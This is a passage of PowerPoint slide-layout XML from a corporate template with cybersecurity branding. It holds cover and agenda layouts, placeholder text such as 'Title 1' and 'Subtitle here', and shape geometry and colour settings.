              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581E6EDA-5387-6DF7-48B0-388A7EB3049F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>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95912" y="252028"/>
            <a:ext cx="1758005" cy="252067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1606043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SG Presentation Generic Cover">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006EFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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18385019-631B-61B6-4B18-B0F613B5E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844" b="12419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6383903" y="851724"/>
            <a:ext cx="5808097" cy="6006276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA22621A-FE50-9E85-2179-027FF6F931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03467" y="2853383"/>
            <a:ext cx="5980436" cy="857489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF529A5-EF59-679B-7E3E-2F6A88634196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403466" y="436225"/>
            <a:ext cx="3032191" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cybersecurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Built For Resilience</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234676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923A57F-2470-77A6-CB91-A681C0CCB4DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423863" y="1752600"/>
            <a:ext cx="11044237" cy="462280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="554400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>↳ Title 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407A4236-9DF8-7CEB-6593-F2719086345E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423863" y="720725"/>
            <a:ext cx="2964694" cy="780095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="72000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5868953D-CAC9-CCED-E16B-BE853369AB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="746760" y="2214880"/>
            <a:ext cx="10721340" cy="604202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Subtitle here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E19D0716-6F66-C98F-A612-176F88DDA02E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423863" y="2819082"/>
            <a:ext cx="11044237" cy="462280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="554400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>↳ Title 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{713E44E0-96C6-5A54-BCCC-A8B52841293E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="746760" y="3281362"/>
            <a:ext cx="10721340" cy="604202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Subtitle here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07C89C08-370F-2F34-08D6-D5EEF6D3F109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423863" y="3885564"/>
            <a:ext cx="11044237" cy="462280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="554400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>↳ Title 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4E9CA5-E985-B9F4-DF8C-253DAA5F955A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="746760" y="4347844"/>
            <a:ext cx="10721340" cy="604202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Subtitle here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1660EFC0-4398-5704-4D03-FD7C43F46A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423863" y="4952046"/>
            <a:ext cx="11044237" cy="462280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="554400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>↳ Title 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19FBFDB3-4FBD-0B5B-46FC-80E19F942243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="746760" y="5414326"/>
            <a:ext cx="10721340" cy="604202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Subtitle here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422278089"/>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267" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="22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SG Presentation Generic Cover">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006EFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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18385019-631B-61B6-4B18-B0F613B5E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844" b="12419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6383903" y="851724"/>
            <a:ext cx="5808097" cy="6006276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA22621A-FE50-9E85-2179-027FF6F931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03467" y="2853383"/>
            <a:ext cx="5980436" cy="857489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF529A5-EF59-679B-7E3E-2F6A88634196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403467" y="436225"/>
            <a:ext cx="2641574" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Experts’ Choice In Cybersecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18447305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Cover">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006EFF"/>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BEA77C8-E0A2-6DAA-1211-54CDC4B2DC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216895" y="1695450"/>
            <a:ext cx="7460755" cy="372070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006EFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="18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THE DIGITAL EXPERIENCE TEAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2186B84-D176-F5B1-3403-6E9664835EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216895" y="2067520"/>
            <a:ext cx="7460755" cy="2194127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800" b="1">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0C38764-F657-7145-C4F6-19E56092ABBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1695452"/>
            <a:ext cx="3348038" cy="4297680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="35200" b="1" baseline="0">
                <a:ln w="15875">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="684259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 Big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BDC2D8-02BA-C6A2-917E-9AB0AD97CFB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403115" y="1871626"/>
            <a:ext cx="11423723" cy="4706727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E9CC08-DA95-7D29-5366-2570E00384DB}"/>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6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04F398C-1E50-BE26-A502-AA2DD0FA27C9}"/>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22520770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One column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018EED9-351B-CB67-0734-001BACC2C07C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408330" y="1871626"/>
            <a:ext cx="11415696" cy="4733359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5C64729-9017-1D7C-1FB4-8341CC473F22}"/>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4" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F15D820-0A75-F04B-A615-20B88DF1EC8A}"/>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801579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age Two columns text">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910E9662-76ED-37C3-13B2-79ECF3CDE91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407140" y="1871625"/>
            <a:ext cx="11414346" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="2" spcCol="4572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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB31034-86B6-7234-164F-A16437E062ED}"/>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11" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F020913-CD4E-C090-9E40-856DBD7B0FAC}"/>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928003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three columns text">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910E9662-76ED-37C3-13B2-79ECF3CDE91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407140" y="1871625"/>
            <a:ext cx="11414346" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="3" spcCol="457200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl2pPr>
              <a:tabLst>
                <a:tab pos="274320" algn="l"/>
              </a:tabLst>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8DDFD4-B9F2-F132-E02A-511D176730C3}"/>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7" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35221955-6466-0EDC-D052-9547550552D4}"/>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27366712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age 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BF417732-A58D-9A40-2435-DAA7A933018F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3947160" y="1871626"/>
            <a:ext cx="7848926" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A6117F2-FDF4-D1F5-9089-ED245BCD53D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409680" y="1871626"/>
            <a:ext cx="3435658" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915C530D-0FD5-FF39-C5B8-4FFFC320D69F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="720725"/>
            <a:ext cx="11425073" cy="568960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
